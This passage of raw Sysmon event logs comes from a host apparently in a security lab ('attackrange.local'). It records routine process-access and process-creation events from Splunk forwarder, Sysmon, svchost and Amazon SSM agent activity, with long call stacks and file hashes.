Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.307{266CAFBE-6482-6064-6600-00000000AE01}3832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.267{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.266{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.265{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.264{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.264{266CAFBE-647E-6064-4300-00000000AE01}39243756C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.264{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPEntity | Where-Object { $_.Service -eq 'xenvbd' }" "| Select-Object" DeviceID "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.227{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.227{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.223{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.215{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 